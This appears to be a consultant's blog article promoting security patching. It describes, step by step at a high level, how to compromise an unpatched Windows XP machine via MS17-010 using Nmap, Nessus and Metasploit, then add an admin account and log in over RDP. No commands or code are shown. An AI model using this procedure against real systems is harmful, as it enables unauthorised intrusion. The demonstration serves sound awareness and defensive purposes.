The importance of security patching cannot be overstated, it is fundamental practice that ensures the integrity, confidentiality, and availability of systems. Despite its importance, patching is often overlooked, leading to vulnerabilities that can be easily exploited by malicious actors. In this article I will show you how trivial it is to compromise an unpatched machine with readily available tools, and limited skill – the process takes less than 5 minutes!

All we need here is Nmap and Metasploit, both of which are included with Kali Linux (other distributions are available), and Nessus, which has a free community edition.

The (TL;DR) executive summary

Some of the exploitation steps in this demonstration get a bit technical, at a high level this is all it takes to get from unpatched system to full access:

  • Scan the network (no permissions required)
  • Scan the vulnerabilities (no permissions required)
  • Execute the readily available exploit (no permissions required)
  • Get access to everything

If you would like to make sure this does not happen to you, contact me via YDC for advice, assessment, and testing.

Why security patching is important

Patching refers to the process of updating software to fix vulnerabilities, improve functionality, and ensure compatibility with other software. These updates are released by software vendors in response to identified security flaws or bugs that could be exploited by attackers. The primary reasons for the importance of security patching include:

    • Security: Patches address known vulnerabilities that could be exploited to gain unauthorised access, escalate privileges, or execute malicious code.

    • Stability: Regular updates help ensure the system runs smoothly by fixing bugs and improving performance.

    • Compliance: Many regulatory frameworks require organisations to maintain up-to-date software to ensure the security of sensitive data.

    • Feature Enhancements: Patches often include new features and improvements that enhance the overall user experience.

The risks of not patching

The failure to apply patches in a timely manner can lead to severe consequences, including:

    • Exploitation of Vulnerabilities: Unpatched systems are prime targets for attackers who exploit known vulnerabilities to infiltrate networks, steal data, or deploy malware.

    • Data Breaches: Sensitive information can be exposed, leading to financial losses, reputational damage, and legal repercussions.

    • System Downtime: Security incidents resulting from unpatched vulnerabilities can cause significant disruptions to operations.

    • Incompatibility Issues: Outdated software may not work well with newer applications or systems, leading to functionality issues.

Demonstrating the ease of exploitation

To illustrate the risks associated with not patching, I will demonstrate how easily an outdated and unpatched operating system can be compromised. This demonstration involves three tools: Nmap, Nessus, and Metasploit. All of which are free, readily available, and easy to use.

Step 1: Identifying the operating system with nmap

Nmap (Network Mapper) is a powerful tool used for network discovery and security auditing. By performing an Nmap scan, we can identify the operating system of a target machine.

To make the example more realistic I did a network scan of the subnet first to find active hosts and copy that list into a text file, then an OS scan of those hosts. The scan results will provide us with insights into the target’s operating system, including details about its version and unpatched state.

And there we go – .140 is a Windows XP machine. Oops.

Step 2: Identifying vulnerabilities with Nessus

Windows XP is a bit of a dumpster fire these days but pretend we do not already know it has more holes in it than grandma’s crochet. Nessus is a vulnerability scanner that helps identify security weaknesses in systems. By running a Nessus scan on the target machine, we can enumerate specific vulnerabilities that need to be patched.

1. Launch Nessus and create a new scan.

2. Enter the target IP address and configure the scan settings.

3. Execute the scan and review the results.

The scan results will highlight critical vulnerabilities, providing detailed information about each, including CVE identifiers, severity levels, and remediation steps.

On this occasion we can drill in and find a missing patch – MS17-010: Security Update for Microsoft Windows SMB Server (4013389).

Step 3: Exploiting vulnerabilities with Metasploit

Metasploit is a well-known penetration testing framework that allows security professionals (and bad guys!) to exploit vulnerabilities and demonstrate the potential impact of unpatched systems.

1. Launch Metasploit and search for an exploit that corresponds to one of the identified vulnerabilities.

2. The only part of this process that requires any talent is knowing Windows XP does not have PowerShell, so we will be wanting the native module. Select the appropriate exploit module and configure the necessary options, including the target IP address.

We can then check whether the target is likely to be vulnerable:

3. Execute the exploit to gain a shell on the target machine.

If the exploit is successful, we will have gained unauthorised access to the unpatched system, demonstrating the ease with which attackers can compromise vulnerable machines.

We are on the system with sufficient permission to do whatever we like – maybe create ourselves a user account and make it an admin:

Then we can RDP to the system and log in as our new user:

This process works on any Windows system with an unpatched vulnerability that permits remote code execution. Guess what happens if you do it on a domain controller? Yep… you get the ability to give yourself permission to anything you like, and it all takes a couple of minutes!

Patch, or pay the price

Patching is a key aspect of maintaining the security and functionality of systems. Neglecting it exposes organisations to significant risks, including data breaches, exploitation of vulnerabilities, and operational disruptions. As we have seen, the process of compromising an outdated and unpatched operating system is alarmingly straightforward using freely available tools like Nmap, Nessus, and Metasploit. By by emphasising the importance of security patching and updates, organisations can safeguard their assets and maintain resilience in the face of evolving cyber threats.

If you would like to make sure this does not happen to you, contact me via YDC for advice, assessment, and testing.